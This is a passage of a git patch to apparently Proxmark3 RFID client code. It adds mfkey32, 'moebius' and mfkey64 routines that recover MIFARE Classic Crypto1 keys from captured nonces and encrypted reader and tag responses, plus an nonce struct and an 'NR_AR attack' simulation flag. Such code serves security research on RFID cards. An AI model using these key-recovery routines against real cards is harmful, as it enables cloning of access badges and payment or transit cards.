emulator memory? (somehow flag to check that to see if new key has successful auth now?) - // to validate key is correct - } - */ } } diff --git a/client/nonce2key/nonce2key.c b/client/nonce2key/nonce2key.c index 9abc814b..3750366b 100644 --- a/client/nonce2key/nonce2key.c +++ b/client/nonce2key/nonce2key.c @@ -151,22 +151,24 @@ int nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint64_t par_info, uint64_ } // 32 bit recover key from 2 nonces -uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc) { +bool mfkey32(nonces_t data, uint64_t *outputkey) { struct Crypto1State *s,*t; + uint64_t outkey = 0; uint64_t key=0; // recovered key - /*uint32_t uid; // serial number - uint32_t nt; // tag challenge - uint32_t nr0_enc; // first encrypted reader challenge - uint32_t ar0_enc; // first encrypted reader response - uint32_t nr1_enc; // second encrypted reader challenge - uint32_t ar1_enc; // second encrypted reader response - */ - uint8_t found=0; - //uint32_t ks2; // keystream used to encrypt reader response - + uint32_t uid = data.cuid; + uint32_t nt = data.nonce; // first tag challenge (nonce) + uint32_t nr0_enc = data.nr; // first encrypted reader challenge + uint32_t ar0_enc = data.ar; // first encrypted reader response + uint32_t nr1_enc = data.nr2; // second encrypted reader challenge + uint32_t ar1_enc = data.ar2; // second encrypted reader response + clock_t t1 = clock(); + bool isSuccess = FALSE; + uint8_t counter=0; + //PrintAndLog("Enter mfkey32"); + //PrintAndLog("Trying sector %d, cuid %08x, nt %08x, nr %08x, ar %08x, nr2 %08x, ar2 %08x",data.sector, uid, nt,nr0_enc,ar0_enc,nr1_enc,ar1_enc); // Generate lfsr succesors of the tag challenge - prng_successor(nt, 64); - prng_successor(nt, 96); + //prng_successor(nt, 64); + //prng_successor(nt, 96); // Extract the keystream from the messages //ks2 = ar0_enc ^ prng_successor(nt, 64); @@ -181,13 +183,112 @@ uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, crypto1_word(t, uid ^ nt, 0); crypto1_word(t, nr1_enc, 1); if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt, 64))) { - //printf("\nFound Key: [%012"llx"]\n\n",key); - found = 1; - break; + //PrintAndLog("Found Key: [%012"llx"]",key); + outkey = key; + counter++; + if (counter==20) break; } } - free(s); + //free(s); + isSuccess = (counter == 1); + t1 = clock() - t1; + //if ( t1 > 0 ) PrintAndLog("Time in mfkey32: %.0f ticks \nFound %d possible keys", (float)t1, counter); + *outputkey = ( isSuccess ) ? outkey : 0; + crypto1_destroy(s); + FILE *fout; + if ((fout = fopen("stats.txt","ab")) == NULL) { + PrintAndLog("Could not create file name stats.txt"); + return 1; + } + fprintf(fout, "mfkey32,%d,%d,%s,%04x%08x,%.0Lf\r\n",counter,data.sector,(data.keytype) ? "B" : "A", (uint32_t)(outkey>>32) & 0xFFFF,(uint32_t)(outkey&0xFFFFFFFF),(long double)t1); + fclose(fout); + return isSuccess; +} - if (found) return key; +bool tryMfk32_moebius(nonces_t data, uint64_t *outputkey) { + struct Crypto1State *s, *t; + uint64_t outkey = 0; + uint64_t key = 0; // recovered key + uint32_t uid = data.cuid; + uint32_t nt0 = data.nonce; // first tag challenge (nonce) + uint32_t nr0_enc = data.nr; // first encrypted reader challenge + uint32_t ar0_enc = data.ar; // first encrypted reader response + //uint32_t uid1 = le32toh(data+16); + uint32_t nt1 = data.nonce2; // second tag challenge (nonce) + uint32_t nr1_enc = data.nr2; // second encrypted reader challenge + uint32_t ar1_enc = data.ar2; // second encrypted reader response + bool isSuccess = FALSE; + int counter = 0; + + //PrintAndLog("Enter mfkey32_moebius"); + clock_t t1 = clock(); + + s = lfsr_recovery32(ar0_enc ^ prng_successor(nt0, 64), 0); + + for(t = s; t->odd | t->even; ++t) { + lfsr_rollback_word(t, 0, 0); + lfsr_rollback_word(t, nr0_enc, 1); + lfsr_rollback_word(t, uid ^ nt0, 0); + crypto1_get_lfsr(t, &key); + + crypto1_word(t, uid ^ nt1, 0); + crypto1_word(t, nr1_enc, 1); + if (ar1_enc == (crypto1_word(t, 0, 0) ^ prng_successor(nt1, 64))) { + //PrintAndLog("Found Key: [%012"llx"]",key); + outkey=key; + ++counter; + if (counter==20) + break; + } + } + isSuccess = (counter == 1); + t1 = clock() - t1; + //if ( t1 > 0 ) PrintAndLog("Time in mfkey32_moebius: %.0f ticks \nFound %d possible keys", (float)t1,counter); + *outputkey = ( isSuccess ) ? outkey : 0; + crypto1_destroy(s); + FILE *fout; + if ((fout = fopen("stats.txt","ab")) == NULL) { + PrintAndLog("Could not create file name stats.txt"); + return 1; + } + fprintf(fout, "moebius,%d,%d,%s,%04x%08x,%0.Lf\r\n",counter,data.sector, (data.keytype) ? "B" : "A", (uint32_t) (outkey>>32),(uint32_t)(outkey&0xFFFFFFFF),(long double)t1); + fclose(fout); + return isSuccess; +} + +int tryMfk64_ex(uint8_t *data, uint64_t *outputkey){ + uint32_t uid = le32toh(data); + uint32_t nt = le32toh(data+4); // tag challenge + uint32_t nr_enc = le32toh(data+8); // encrypted reader challenge + uint32_t ar_enc = le32toh(data+12); // encrypted reader response + uint32_t at_enc = le32toh(data+16); // encrypted tag response + return tryMfk64(uid, nt, nr_enc, ar_enc, at_enc, outputkey); +} + +int tryMfk64(uint32_t uid, uint32_t nt, uint32_t nr_enc, uint32_t ar_enc, uint32_t at_enc, uint64_t *outputkey){ + uint64_t key = 0; // recovered key + uint32_t ks2; // keystream used to encrypt reader response + uint32_t ks3; // keystream used to encrypt tag response + struct Crypto1State *revstate; + + PrintAndLog("Enter mfkey64"); + clock_t t1 = clock(); + + // Extract the keystream from the messages + ks2 = ar_enc ^ prng_successor(nt, 64); + ks3 = at_enc ^ prng_successor(nt, 96); + revstate = lfsr_recovery64(ks2, ks3); + lfsr_rollback_word(revstate, 0, 0); + lfsr_rollback_word(revstate, 0, 0); + lfsr_rollback_word(revstate, nr_enc, 1); + lfsr_rollback_word(revstate, uid ^ nt, 0); + crypto1_get_lfsr(revstate, &key); + PrintAndLog("Found Key: [%012"llx"]", key); + crypto1_destroy(revstate); + *outputkey = key; + + t1 = clock() - t1; + if ( t1 > 0 ) PrintAndLog("Time in mfkey64: %.0f ticks \n", (float)t1); return 0; } + diff --git a/client/nonce2key/nonce2key.h b/client/nonce2key/nonce2key.h index b00a85dc..fac9c151 100644 --- a/client/nonce2key/nonce2key.h +++ b/client/nonce2key/nonce2key.h @@ -17,8 +17,26 @@ #include #include "crapto1.h" #include "common.h" +//#include //for bool + +typedef struct { + uint32_t cuid; + uint8_t sector; + uint8_t keytype; + uint32_t nonce; + uint32_t ar; + uint32_t nr; + uint32_t nonce2; + uint32_t ar2; + uint32_t nr2; + } nonces_t; int nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint64_t par_info, uint64_t ks_info, uint64_t * key); -uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc); +bool mfkey32(nonces_t data, uint64_t *outputkey); +bool tryMfk32_moebius(nonces_t data, uint64_t *outputkey); +int tryMfk64_ex(uint8_t *data, uint64_t *outputkey); +int tryMfk64(uint32_t uid, uint32_t nt, uint32_t nr_enc, uint32_t ar_enc, uint32_t at_enc, uint64_t *outputkey); + +//uint64_t mfkey32(uint32_t uid, uint32_t nt, uint32_t nr0_enc, uint32_t ar0_enc, uint32_t nr1_enc, uint32_t ar1_enc); #endif diff --git a/client/util.c b/client/util.c index 9b99cdf1..e4add6c0 100644 --- a/client/util.c +++ b/client/util.c @@ -498,6 +498,9 @@ void xor(unsigned char *dst, unsigned char *src, size_t len) { int32_t le24toh (uint8_t data[3]) { return (data[2] << 16) | (data[1] << 8) | data[0]; } +uint32_t le32toh (uint8_t *data) { + return (uint32_t)( (data[3]<<24) | (data[2]<<16) | (data[1]<<8) | data[0]); +} // RotateLeft - Ultralight, Desfire, works on byte level // 00-01-02 >> 01-02-00 diff --git a/client/util.h b/client/util.h index 34e821bf..1b6b2fb1 100644 --- a/client/util.h +++ b/client/util.h @@ -70,4 +70,5 @@ void wiegand_add_parity(uint8_t *target, uint8_t *source, uint8_t length); void xor(unsigned char *dst, unsigned char *src, size_t len); int32_t le24toh(uint8_t data[3]); +uint32_t le32toh (uint8_t *data); void rol(uint8_t *data, const size_t len); diff --git a/common/protocols.h b/common/protocols.h index cdcf720b..b57c414f 100644 --- a/common/protocols.h +++ b/common/protocols.h @@ -109,20 +109,25 @@ NXP/Philips CUSTOM COMMANDS #define ISO14443A_CMD_WUPA 0x52 #define ISO14443A_CMD_ANTICOLL_OR_SELECT 0x93 #define ISO14443A_CMD_ANTICOLL_OR_SELECT_2 0x95 +#define ISO14443A_CMD_ANTICOLL_OR_SELECT_3 0x97 #define ISO14443A_CMD_WRITEBLOCK 0xA0 // or 0xA2 ? #define ISO14443A_CMD_HALT 0x50 #define ISO14443A_CMD_RATS 0xE0 -#define MIFARE_AUTH_KEYA 0x60 -#define MIFARE_AUTH_KEYB 0x61 -#define MIFARE_MAGICWUPC1 0x40 -#define MIFARE_MAGICWUPC2 0x43 -#define MIFARE_MAGICWIPEC 0x41 +#define MIFARE_AUTH_KEYA 0x60 +#define MIFARE_AUTH_KEYB 0x61 +#define MIFARE_MAGICWUPC1 0x40 +#define MIFARE_MAGICWUPC2 0x43 +#define MIFARE_MAGICWIPEC 0x41 #define MIFARE_CMD_INC 0xC0 #define MIFARE_CMD_DEC 0xC1 #define MIFARE_CMD_RESTORE 0xC2 #define MIFARE_CMD_TRANSFER 0xB0 +#define MIFARE_EV1_PERSONAL_UID 0x40 +#define MIFARE_EV1_SETMODE 0x43 + + #define MIFARE_ULC_WRITE 0xA2 //#define MIFARE_ULC__COMP_WRITE 0xA0 #define MIFARE_ULC_AUTH_1 0x1A diff --git a/include/usb_cmd.h b/include/usb_cmd.h index 8448b06a..03a573d5 100644 --- a/include/usb_cmd.h +++ b/include/usb_cmd.h @@ -212,10 +212,11 @@ typedef struct{ //Mifare simulation flags -#define FLAG_INTERACTIVE 0x01 -#define FLAG_4B_UID_IN_DATA 0x02 -#define FLAG_7B_UID_IN_DATA 0x04 -#define FLAG_NR_AR_ATTACK 0x08 +#define FLAG_INTERACTIVE 0x01 +#define FLAG_4B_UID_IN_DATA 0x02 +#define FLAG_7B_UID_IN_DATA 0x04 +#define FLAG_10B_UID_IN_DATA 0x08 +#define FLAG_NR_AR_ATTACK 0x10 //Iclass reader flags -- 2.39.2